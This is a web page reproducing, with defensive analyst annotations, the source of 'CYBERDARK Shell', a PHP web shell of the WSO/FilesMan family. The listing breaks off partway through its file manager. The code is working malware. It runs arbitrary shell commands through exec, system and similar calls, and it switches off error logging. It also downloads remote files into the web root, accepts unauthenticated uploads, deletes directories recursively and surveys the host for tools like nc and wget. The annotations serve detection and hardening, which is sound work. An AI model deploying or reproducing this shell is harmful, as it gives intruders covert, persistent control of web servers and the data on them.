
CYBERDARK Shell

11 Feb 2014

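Another FilesMan shell script? The source below sets `$default_action = 'FilesMan'` and names its sort helper `wsoCmp`, so it looks like a rebranded member of the WSO/FilesMan family of PHP web shells.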

CYBERDARK Shell Source Code

   1 <?php
      // Analyst annotation (defensive review): this listing is a PHP web shell. It is driven
      // by POST fields (c, rtdown, a, p1, p2, p3, charset), and no authentication check is
      // visible in this part of the listing.
   2 
   3 /**
   4  * @author CYBERDARK
   5  * @copyright 2012
   6  */
   7 @define('VERSION','1.0');
   8 @error_reporting(E_ALL ^ E_NOTICE);
   9 @session_start();
      // The next two settings switch off PHP error logging for the request, so the script's own
      // failures are not written to the PHP error log. Web-server access logs are not affected.
  10 @ini_set('error_log',NULL);
  11 @ini_set('log_errors',0);
      // Lifts the execution time limit for the request.
  12 @ini_set('max_execution_time',0);
  13 @set_time_limit(0);
      // NOTE(review): the magic-quotes functions called here and below were removed from later
      // PHP releases, which suggests the sample was written for PHP 5 - confirm when triaging.
  14 @set_magic_quotes_runtime(0);
  15 
      // Undoes magic-quotes escaping on every POST value, recursing into arrays.
  16 if(get_magic_quotes_gpc()) {
  17    function madstripslashes($array) {
  18        return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
  19    }
  20    $_POST = madstripslashes($_POST);
  21 }
      // Defaults. The dispatcher that would consume $default_action is not in this part of the listing.
  22 $default_action = 'FilesMan';
  23 $default_use_ajax = true;
  24 $default_charset = 'Windows-1251';
      // Platform switch: 'win' when PHP_OS starts with "win" (case-insensitive), otherwise 'unix'.
  25 if (strtolower(substr(PHP_OS,0,3))=="win")
  26     $sys='win';
  27  else
  28     $sys='unix';
  29     
      // $home_cwd is the directory the script started in. The working directory used by
      // everything that follows is then taken, unvalidated, from POST field 'c'.
  30 $home_cwd = @getcwd();
  31 if(isset($_POST['c']))
  32    @chdir($_POST['c']);   
  33     
  34 $cwd = @getcwd();
      // Normalises Windows backslashes to forward slashes.
  35 if($sys == 'win') 
  36 {
  37     $home_cwd = str_replace("\\", "/", $home_cwd);
  38    $cwd = str_replace("\\", "/", $cwd);
  39 }
  40 
      // Ensures $cwd ends with a slash so names can be appended to it directly.
  41 if($cwd[strlen($cwd)-1] != '/' )
  42    $cwd .= '/';
  43     
  44     
  45 function madEx($in) {
         // Runs the command string $in and returns the captured output as a string.
         // It uses the first of exec, passthru, system and shell_exec for which
         // function_exists() is true, and otherwise tries popen.
         // Hardening note: all five process-spawning primitives are candidates here, so a
         // disable_functions policy needs to list every one of them. Child processes spawned
         // by the web-server/PHP account are the host-side signal for this function.
  46    $out = '';
  47    if (function_exists('exec')) {
             // exec() fills $out with an array of output lines, which are re-joined with newlines.
  48        @exec($in,$out);
  49        $out = @join("\n",$out);
  50    } elseif (function_exists('passthru')) {
             // passthru() and system() print directly, so their output is captured with output buffering.
  51        ob_start();
  52        @passthru($in);
  53        $out = ob_get_clean();
  54    } elseif (function_exists('system')) {
  55        ob_start();
  56        @system($in);
  57        $out = ob_get_clean();
  58    } elseif (function_exists('shell_exec')) {
  59        $out = shell_exec($in);
  60    } elseif (is_resource($f = @popen($in,"r"))) {
             // Last resort: reads the pipe in 1024-byte chunks until end of file.
  61        $out = "";
  62        while(!@feof($f))
  63            $out .= fread($f,1024);
  64        pclose($f);
  65    }
  66    return $out;
  67 }
  68 $down=@getcwd();
  69 if($sys=="win")
  70 $down.='\\';
  71 else
  72 $down.='/';
      // "HTTP download" handler: when POST field 'rtdown' is set, its value is opened with
      // fopen() and copied in 8 KiB chunks to a file in the current working directory, named
      // after basename() of the supplied value.
      // Defensive notes: fetching a remote URL this way depends on PHP's allow_url_fopen
      // setting. The server-side signals are an outbound connection made by the web-server
      // process and a new file appearing in the web root, so egress filtering and
      // file-integrity monitoring are the relevant controls.
  73 if(isset($_POST['rtdown']))
  74 {
  75 $url = $_POST['rtdown'];
  76 $newfname = $down. basename($url);
  77 $file = fopen ($url, "rb");
  78 if ($file) {
  79   $newf = fopen ($newfname, "wb");
  80   if ($newf)
  81   while(!feof($file)) {
  82     fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  83   }
  84   }
  85 
  86 if ($file) {
  87   fclose($file);
  88 }
  89 if ($newf) {
  90   fclose($newf);
  91 }
  92 }
  93 
  94     
  95  
  96  function madhead()
  97  {
       // Prints the page head (inline CSS and JavaScript), a banner summarising the host
       // environment, and the action menu. madFilesMan() and madFilesTools() call it before
       // producing their own output.
  98     if(empty($_POST['charset']))
  99        $_POST['charset'] = $GLOBALS['default_charset'];
 100  
      // Host reconnaissance shown in the banner: disk usage of the working directory, which
      // database/cURL extensions are loaded, and the disable_functions, safe_mode and
      // open_basedir restrictions in force.
 101 $freeSpace = @diskfreespace($GLOBALS['cwd']);
 102 $totalSpace = @disk_total_space($GLOBALS['cwd']);
 103 $totalSpace = $totalSpace?$totalSpace:1;        
 104     
 105 $on="<font color=#0F0> ON </font>";
 106 $of="<font color=red> OFF </font>";
 107 $none="<font color=#0F0> NONE </font>";   
 108 if(function_exists('curl_version'))
 109     $curl=$on;
 110 else
 111     $curl=$of;
 112 if(function_exists('mysql_get_client_info'))
 113     $mysql=$on;
 114  else
 115     $mysql=$of;      
 116 if(function_exists('mssql_connect'))
 117     $mssql=$on;
 118 else
 119    $mssql=$of; 
 120        
 121 if(function_exists('pg_connect'))
 122     $pg=$on;
 123 else
 124    $pg=$of;          
 125 if(function_exists('oci_connect'))
 126    $or=$on;
 127 else
 128    $or=$of;
 129 if(@ini_get('disable_functions'))
 130   $disfun=@ini_get('disable_functions');
 131 else
 132 $disfun="All Functions Enable";
 133 if(@ini_get('safe_mode'))
 134 $safe_modes="<font color=red>ON</font>";
 135 else
 136 $safe_modes="<font color=#0F0 >OFF</font>";
 137 if(@ini_get('open_basedir'))
 138 $open_b=@ini_get('open_basedir');
 139     else
 140   $open_b=$none;
 141     
 142 
 143 if(@ini_get('safe_mode_exec_dir'))
 144 $safe_exe=@ini_get('safe_mode_exec_dir');
 145     else
 146 $safe_exe=$none;
 147 if(@ini_get('safe_mode_include_dir'))
 148    $safe_include=@ini_get('safe_mode_include_dir'); 
 149 else
 150  $safe_include=$none;
      // Account the PHP process runs as: effective uid/gid resolved to names through the POSIX
      // functions when they exist, otherwise the script owner's ids with the group shown as "?".
 151 if(!function_exists('posix_getegid')) 
 152 {
 153        $user = @get_current_user();
 154        $uid = @getmyuid();
 155        $gid = @getmygid();
 156        $group = "?";
 157 } else 
 158 {
 159        $uid = @posix_getpwuid(posix_geteuid());
 160        $gid = @posix_getgrgid(posix_getegid());
 161        $user = $uid['name'];
 162        $uid = $uid['uid'];
 163        $group = $gid['name'];
 164        $gid = $gid['gid'];
 165    }
 166 
 167 
      // Builds one clickable link per component of the working directory path.
 168      $cwd_links = '';
 169    $path = explode("/", $GLOBALS['cwd']);
 170    $n=count($path);
 171    for($i=0; $i<$n-1; $i++) {
 172        $cwd_links .= "<a  href='#' onclick='g(\"FilesMan\",\"";
 173        for($j=0; $j<=$i; $j++)
 174            $cwd_links .= $path[$j].'/';
 175        $cwd_links .= "\")'>".$path[$i]."/</a>";
 176    }
 177 
      // Probes drive letters c: to z: and links each one that exists. The links are only
      // printed further down when $sys is "win".
 178 $drives = "";
 179 foreach(range('c','z') as $drive)
 180 if(is_dir($drive.':\\'))
 181 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 182 
 183 
 184 
 185 
 186 
      // Static page head. The <title> text and the favicon URL in the string below are fixed
      // literals, which makes them usable as content signatures when scanning a web root or
      // inspecting HTTP responses.
 187  echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 188 <html xmlns="http://www.w3.org/1999/xhtml">
 189 <head>
 190 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 191 <link href="http://www.madspot.net/favicon.ico" rel="icon" type="image/x-icon"/>
 192 <title>Madspot Security Team Shell</title>
 193 <style type="text/css">
 194 <!--
 195 .whole {
 196   background-color: #CCC;
 197   height:auto;
 198   width: auto;
 199   margin-top: 10px;
 200   margin-right: 10px;
 201   margin-left: 10px;
 202 }
 203 .header {
 204   height: auto;
 205   width: auto;
 206   border: 7px solid #CCC;
 207   color: #999;
 208   font-size: 12px;
 209   font-family: Verdana, Geneva, sans-serif;
 210   background-color: #000;
 211 }
 212 .header a {color:#0F0; text-decoration:none;}
 213 span {
 214   font-weight: bolder;
 215   color: #FFF;
 216 }
 217 #meunlist {
 218   font-family: Verdana, Geneva, sans-serif;
 219   color: #FFF;
 220   background-color: #000;
 221   width: auto;
 222   border-right-width: 7px;
 223   border-left-width: 7px;
 224   border-top-style: solid;
 225   border-right-style: solid;
 226   border-bottom-style: solid;
 227   border-left-style: solid;
 228   border-top-color: #CCC;
 229   border-right-color: #CCC;
 230   border-bottom-color: #CCC;
 231   border-left-color: #CCC;
 232   height: auto;
 233   font-size: 12px;
 234   font-weight: bold;
 235   border-top-width: 0px;
 236 }
 237   .whole #meunlist ul {
 238   padding-top: 5px;
 239   padding-right: 5px;
 240   padding-bottom: 7px;
 241   padding-left: 2px;
 242   text-align:center;
 243   list-style-type: none;
 244   margin: 0px;
 245 }
 246   .whole #meunlist li {
 247   margin: 0px;
 248   padding: 0px;
 249   display: inline;
 250 }
 251   .whole #meunlist a {
 252     font-family: arial, sans-serif;
 253   font-size: 14px;
 254   text-decoration:none;
 255   font-weight: bold;
 256   color: #fff;
 257   clear: both;
 258   width: 100px;
 259   margin-right: -6px;
 260   padding-top: 3px;
 261   padding-right: 15px;
 262   padding-bottom: 3px;
 263   padding-left: 15px;
 264   border-right-width: 1px;
 265   border-right-style: solid;
 266   border-right-color: #FFF;
 267 }
 268   .whole #meunlist a:hover {
 269   color: #000;
 270   background: #fff;
 271 }
 272 
 273 .foot {
 274   font-family: Verdana, Geneva, sans-serif;
 275   background-color: #000;
 276   margin: 0px;
 277   padding: 0px;
 278   width: 100%;
 279   text-align: center;
 280   font-size: 12px;
 281   color: #CCC;
 282   border-right-width: 7px;
 283   border-left-width: 7px;
 284     border-bottom-width: 7px;
 285     border-bottom-style: solid;
 286     border-right-style: solid;
 287     border-right-style: solid;
 288   border-left-style: solid;
 289   border-top-color: #CCC;
 290   border-right-color: #CCC;
 291   border-bottom-color: #CCC;
 292   border-left-color: #CCC;
 293 }';
      // The footer inputs are styled red when the working directory is not writable.
 294 if(is_writable($GLOBALS['cwd']))
 295  {
 296     echo ".foottable {
 297     width: 300px;
 298     font-weight: bold;
 299     }";}
 300     else
 301     {
 302        echo ".foottable {
 303     width: 300px;
 304     font-weight: bold;
 305     background-color:red;
 306     }
 307     .dir {
 308       background-color:red;  
 309     }
 310     "; 
 311     }    
 312  echo '.main th{text-align:left;}
 313  .main a{color: #FFF;}
 314  .main tr:hover{background-color:red;}
 315  .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
 316  .bigarea{ width:99%; height:300px; }   
 317   </style>
 318 
 319 ';
 320 
      // Client-side request builder. set() copies its arguments, or the values echoed back
      // from the previous request, into the hidden form "mf" printed just below, and g()
      // submits that form. Every action therefore arrives as a POST carrying the fields
      // a, c, p1, p2, p3 and charset. That field set is the request-level indicator to look
      // for in WAF rules or request-body logs.
 321 echo "<script>
 322     var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
 323     var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
 324     var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
 325     var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
 326     var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
 327     var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
 328     var d = document;
 329   function set(a,c,p1,p2,p3,charset) {
 330       if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
 331       if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
 332       if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
 333       if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
 334       if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
 335       if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 336   }
 337   function g(a,c,p1,p2,p3,charset) {
 338       set(a,c,p1,p2,p3,charset);
 339       d.mf.submit();
 340   }</script>";
 341 
 342     
      // Banner rows: uname, user/group, PHP version and addresses. The labels are swapped
      // relative to the values: "Our IP" prints SERVER_ADDR and "Server IP" prints
      // REMOTE_ADDR, which is the address of the requesting client.
 343    echo '
 344 </head>
 345 
 346 <body bgcolor="#000000"  leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 347 <div class="whole">
 348 <form method=post name=mf style="display:none;">
 349 <input type=hidden name=a>
 350 <input type=hidden name=c>
 351 <input type=hidden name=p1>
 352 <input type=hidden name=p2>
 353 <input type=hidden name=p3>
 354 <input type=hidden name=charset>
 355 </form>
 356   <div class="header"><table width="100%" border="0"  align="lift">
 357   <tr>
 358     <td width="3%"><span>Uname:</span></td>
 359     <td colspan="2">'.substr(@php_uname(), 0, 120).'</td>
 360     </tr>
 361   <tr>
 362     <td><span>User:</span></td>
 363     <td>'. $uid . ' [ ' . $user . ' ] <span>   Group: </span>' . $gid . ' [ ' . $group . ' ] </td>
 364     <td width="14%" rowspan="8"><img alt="" src="" /></td>
 365   </tr>
 366   <tr>
 367     <td><span>PHP:</span></td>
 368     <td>'.@phpversion(). '   <span>   Safe Mode:'.$safe_modes.'</span></td>
 369     </tr>
 370   <tr>
 371     <td><span>Our IP:</span></td>
 372     <td>'.@$_SERVER["SERVER_ADDR"].'    <span>Server IP:</span> '.@$_SERVER["REMOTE_ADDR"].'</td>
 373   </tr>
 374   <tr>
 375     <td><span>WEBS:</span></td>
 376     <td width="76%">';
 377     
      // On unix, reads /etc/named.conf and counts the lines that define a zone, as an
      // estimate of how many domains the host serves. Keeping that file unreadable to the
      // web-server account yields the "CANT READ" branch.
      // NOTE(review): ereg() was removed from later PHP releases - another sign that this
      // sample was written for PHP 5.
 378     if($GLOBALS['sys']=='unix')
 379     {
 380         $d0mains = @file("/etc/named.conf");
 381         if(!$d0mains)
 382         {
 383             echo "CANT READ named.conf";
 384         }
 385         else
 386         {
 387           $count;  
 388          foreach($d0mains as $d0main)
 389          {
 390           if(@ereg("zone",$d0main))
 391           {
 392           preg_match_all('#zone "(.*)"#', $d0main, $domains);
 393            flush();
 394           if(strlen(trim($domains[1][0])) > 2){
 395          flush();
 396          $count++;
 397            } 
 398            }
 399            }
 400            echo "$count  Domains";
 401         }
 402     }
 403     else{ echo"CANT READ |Windows|";}
 404     
 405       echo '</td>
 406     </tr>
 407     <tr>
 408     <td height="16"><span>HDD:</span></td>
 409     <td>'.madSize($totalSpace).' <span>Free:</span>' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</td>
 410     </tr>';
 411   
      // Tool inventory: on unix with safe_mode off, madWhich() is called once for each name in
      // the two lists below, and each call runs a "which" command through madEx(). Every page
      // render therefore spawns a burst of short-lived "which" processes under the web-server
      // account, which is a usable host-based detection signal. On Windows it runs "ver".
 412      if($GLOBALS['sys']=='unix' )
 413 {
 414     if(!@ini_get('safe_mode'))
 415     {
 416     
 417     echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
 418     $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 419      foreach($userful as $item)
 420          if(madWhich($item))
 421          echo $item.',';
 422          echo '</td>
 423          </tr>
 424           <tr>
 425           <td height="0" colspan="2"><span>Downloader:</span>';
 426          
 427      $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 428       foreach($downloaders as $item2)
 429        if(madWhich($item2))
 430         echo $item2.',';
 431         echo '</td>
 432               </tr>';
 433          
 434           }
 435            else 
 436            {
 437          echo '<tr><td height="18" colspan="2"><span>useful:</span>'; 
 438          echo '--------------</td>
 439            </tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 440               </tr>';  
 441          }
 442 }
 443 else
 444 {
 445    echo '<tr><td height="18" colspan="2"><span>Window:</span>';
 446    echo madEx('ver');
 447    echo '</td>
 448          </tr> <tr>
 449         <td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 450               </tr>'; 
 451     
 452 }  
 453     
 454  
      // The base64 literal in the string below decodes to an HTML anchor that links to
      // www.madspot.net with the label MADSPOT.NET. It is a branding link rather than code,
      // and the encoded literal is one more fixed string usable as a file signature.
 455  echo '<tr>
 456     <td height="16" colspan="2"><span>Disabled functions:</span>'.$disfun.'</td>
 457   </tr>
 458   <tr>
 459     <td height="16" colspan="2"><span>cURL:'.$curl.'  MySQL:'.$mysql.'  MSSQL:'.$mssql.'  PostgreSQL:'.$pg.'  Oracle: </span>'.$or.'</td><td width="15%">'.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwvZm9udD48L3NwYW4+PC9hPg==").'</td>
 460   </tr>
 461   <tr>
 462   <td height="11" colspan="3"><span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.'   Safe_mode_include_dir:'.$safe_include.'</td>
 463   </tr>
 464   <tr>
 465     <td height="11"><span>Server </span></td>
 466     <td colspan="2">'.@getenv('SERVER_SOFTWARE').'</td>
 467   </tr>';
 468   if($GLOBALS[sys]=="win")
 469   {
 470     echo '<tr>
 471     <td height="12"><span>DRIVE:</span></td>
 472     <td colspan="2">'.$drives.'</td>
 473      </tr>';
 474   }
 475   
      // Action menu. Each entry submits its action name in field "a": FilesMan, proc, phpeval,
      // sql, hash, connect, zoneh, dos, safe, symlink, spot and selfrm. Only the FilesMan and
      // FilesTools handlers appear in this part of the listing.
 476   echo '<tr>
 477     <td height="12"><span>PWD:</span></td>
 478     <td colspan="2">'.$cwd_links.'  <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >|CURRENT|</font></a></td>
 479   </tr>
 480   </table>
 481 </div>
 482  <div id="meunlist">
 483       <ul>
 484 <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
 485 
 486 <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">PROCESS</a></li>
 487 <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
 488 <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
 489 <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
 490 <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">CONNECT</a></li>
 491 <li><a href="#" onclick="g(\'zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
 492 <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
 493 <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
 494 <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
 495 <li><a href="#" onclick="g(\'spot\',null,\'\',\'\',\'\')">MADSPOT</a></li>
 496 <li><a href="#" onclick="g(\'selfrm\',null,\'\',\'\',\'\')">KIll C0de</a></li>
 497 </ul>
 498     
 499     </div>
 500 ';   
 501     
 502 }
 503 
 504 function madfooter()
 505 {
      // Prints the footer forms and closes the page: make file, make directory, delete, chmod,
      // change directory, "HTTP download" (plain POST of field rtdown), execute, and a
      // multipart file upload that posts a=FilesMAn with p1=uploadFile.
      // Detection note: the upload and download forms submit directly, without the hidden
      // "mf" form, so requests carrying only rtdown, or a multipart body with file field "f",
      // belong to the same indicator set as the a/c/p1/p2/p3/charset POSTs.
 506     
 507     echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
 508        <tr>
 509          <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>__MK FILE__</span><br><input class='dir'  type=text name=f value=''><input type=submit value='>>'></form></td>
 510          <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>__MK DIR__</span><br><input class='dir' type=text name=d value=''><input type=submit value='>>'></form></td>
 511          <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);return false;\"><span>__DELETE__</span><br><input class='dir' type=text name=del value=''><input type=submit value='>>'></form></td>
 512          <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');return false;\"><span>__CHMOD__</span><br><input class='dir' type=text name=f value=''><input type=submit value='>>'></form></td>
 513        </tr>
 514        <tr>
 515          <td colspan='2'><form onsubmit='g(null,this.c.value,\"\");return false;'><span>__CHANGE DIR__</span><br><input class='foottable' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit value='>>'></form></td>
 516          <td colspan='2'><form method='post' ><span>__HTTP DOWNLOAD__</span><br><input class='foottable' type=text name=rtdown value=''><input type=submit value='>>'></form></td>
 517         </tr>
 518        <tr>
 519          <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);return false;\"><span>__EXECUTE__</span><br><input class='foottable' type=text name=c value=''><input type=submit value='>>'></form></td>
 520         </tr>
 521        <tr>
 522          <td colspan='4'><form method='post' ENCTYPE='multipart/form-data'>
 523       <input type=hidden name=a value='FilesMAn'>
 524       <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
 525       <input type=hidden name=p1 value='uploadFile'>
 526       <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
 527         <span>Upload file:</span><br><input class='toolsInp' type=file name=f><br /><input type=submit value='>>'></form></td>
 528         </tr> 
 529       </table>
 530   </div>
 531   </body>
 532 </html>
 533 ";
 534     
 535 }
 536 if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
         // Fallback stubs: when a POSIX lookup function is missing and is not named in
         // disable_functions, a replacement that always returns false is defined, so later
         // calls to it do not fail.
 537    function posix_getpwuid($p) {return false;} }
 538 if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
 539   function posix_getgrgid($p) {return false;} }
 540 
 541 function madWhich($p) {
         // Runs "which <name>" through madEx() and returns the output, or false when the
         // output is empty. $p is concatenated into the command line unescaped. The callers
         // visible in this listing pass fixed tool names only.
 542    $path = madEx('which ' . $p);
 543    if(!empty($path))
 544        return $path;
 545    return false;
 546 }
 547 
 548 
 549 
 550 function madSize($s) {
         // Formats a byte count for display: two decimals with a GB, MB or KB suffix at
         // thresholds of 1024^3, 1024^2 and 1024 bytes, otherwise the raw number followed by " B".
 551    if($s >= 1073741824)
 552        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 553    elseif($s >= 1048576)
 554        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 555    elseif($s >= 1024)
 556        return sprintf('%1.2f', $s / 1024 ) . ' KB';
 557    else
 558        return $s . ' B';
 559 }
 560 
 561 
 562 function madPerms($p) {
         // Renders the mode value $p as a ten-character ls-style string. The first character is
         // the file type (s socket, l link, - regular file, b block device, d directory,
         // c character device, p FIFO, u unknown). Owner, group and other rwx triplets follow.
 563    if (($p & 0xC000) == 0xC000)$i = 's';
 564    elseif (($p & 0xA000) == 0xA000)$i = 'l';
 565    elseif (($p & 0x8000) == 0x8000)$i = '-';
 566    elseif (($p & 0x6000) == 0x6000)$i = 'b';
 567    elseif (($p & 0x4000) == 0x4000)$i = 'd';
 568    elseif (($p & 0x2000) == 0x2000)$i = 'c';
 569    elseif (($p & 0x1000) == 0x1000)$i = 'p';
 570    else $i = 'u';
 571    $i .= (($p & 0x0100) ? 'r' : '-');
 572    $i .= (($p & 0x0080) ? 'w' : '-');
         // In the execute position, bit 0x0800 (setuid) shows as s with execute set and S without.
 573    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 574    $i .= (($p & 0x0020) ? 'r' : '-');
 575    $i .= (($p & 0x0010) ? 'w' : '-');
         // Same scheme for bit 0x0400 (setgid) in the group triplet.
 576    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 577    $i .= (($p & 0x0004) ? 'r' : '-');
 578    $i .= (($p & 0x0002) ? 'w' : '-');
         // Bit 0x0200 (sticky) shows as t with execute set and T without.
 579    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 580    return $i;
 581 }
 582 function madPermsColor($f) {
         // Returns the madPerms() string for path $f wrapped in a <font> tag: red when the PHP
         // process cannot read the path, white when it can read but not write, green when it
         // can do both.
 583    if (!@is_readable($f))
 584        return '<font color=#FF0000>' . madPerms(@fileperms($f)) . '</font>';
 585    elseif (!@is_writable($f))
 586        return '<font color=white>' . madPerms(@fileperms($f)) . '</font>';
 587    else
 588        return '<font color=#25ff00>' . madPerms(@fileperms($f)) . '</font>';
 589 }
 590 
 591 if(!function_exists("scandir")) {
         // Polyfill for runtimes without scandir(): returns the directory's entry names, read
         // with opendir()/readdir(). Unlike the built-in, it does not sort the entries, and the
         // handle is never closed.
 592    function scandir($dir) {
 593        $dh  = opendir($dir);
 594        while (false !== ($filename = readdir($dh)))
 595            $files[] = $filename;
 596        return $files;
 597    }
 598 }
 599 
 600 
 601 function madFilesMan() {
         // File-manager action. It first applies the operation named in POST field p1
         // (uploadFile, mkdir or delete; any other value is stored in the session), then prints
         // a table of the directory's contents followed by the footer.
         // Defensive note: each operation runs with the privileges of the PHP process and takes
         // its path from the request unvalidated. The resulting writes and deletions are what
         // file-integrity monitoring on the web root would surface. Denying PHP execution in
         // writable directories and running PHP under a least-privilege account limit the impact.
 602    madhead();
 603     echo '<div class=header><script>p1_=p2_=p3_="";</script>';
 604    if(!empty($_POST['p1'])) {
 605        switch($_POST['p1']) {
 606            case 'uploadFile':
                     // Saves the uploaded file under its client-supplied name, relative to the
                     // working directory.
 607                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
 608                    echo "Can't upload file!";
 609                break;
 610            case 'mkdir':
 611                if(!@mkdir($_POST['p2']))
 612                    echo "Can't create new dir";
 613                break;
 614            case 'delete':
                     // Recursive delete: deleteDir() walks the tree, unlinking files and removing
                     // directories. A non-directory path is unlinked directly.
 615                function deleteDir($path) {
 616                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
 617                    $dh  = opendir($path);
 618                    while ( ($item = readdir($dh) ) !== false) {
 619                        $item = $path.$item;
 620                        if ( (basename($item) == "..") || (basename($item) == ".") )
 621                            continue;
 622                        $type = filetype($item);
 623                        if ($type == "dir")
 624                            deleteDir($item);
 625                        else
 626                            @unlink($item);
 627                    }
 628                    closedir($dh);
 629                    @rmdir($path);
 630                }
 631                if(is_dir(@$_POST['p2']))
 632                deleteDir(@$_POST['p2']);
 633                else
 634                @unlink(@$_POST['p2']);
 635                break;
 636        default:
                     // Any other p1 value is remembered in the session with the posted file list
                     // (URL-decoded) and directory. The code that consumes these session keys is
                     // not in this part of the listing.
 637                 if(!empty($_POST['p1'])) {
 638                    $_SESSION['act'] = @$_POST['p1'];
 639                    $_SESSION['f'] = @$_POST['f'];
 640                    foreach($_SESSION['f'] as $k => $f)
 641                        $_SESSION['f'][$k] = urldecode($f);
 642                    $_SESSION['c'] = @$_POST['c'];
 643                }
 644                break;
 645        }
 646    }
         // Lists the directory named in POST field c when present, otherwise the working directory.
 647    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
 648    if($dirContent === false) {   echo '<h3><span>|  Access Denied! |</span></h3></div>';madFooter(); return; }
         // Sort order defaults to name ascending. A p1 value of the form s_<column>_<digit>
         // overrides it.
 649    global $sort;
 650    $sort = array('name', 1);
 651    if(!empty($_POST['p1'])) {
 652        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
 653            $sort = array($match[1], (int)$match[2]);
 654    }
 655 echo "
 656 <table width='100%' class='main' cellspacing='0' cellpadding='2'  >
 657 <form name=files method=post><tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
         // Collects name, path, mtime, permissions, size, owner and group for every entry and
         // splits the entries into files and directories. Symlinks are grouped with directories.
 658    $dirs = $files = array();
 659    $n = count($dirContent);
 660    for($i=0;$i<$n;$i++) {
 661        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
 662        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
 663        $tmp = array('name' => $dirContent[$i],
 664                     'path' => $GLOBALS['cwd'].$dirContent[$i],
 665                     'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
 666                     'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
 667                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
 668                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
 669                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
 670                    );
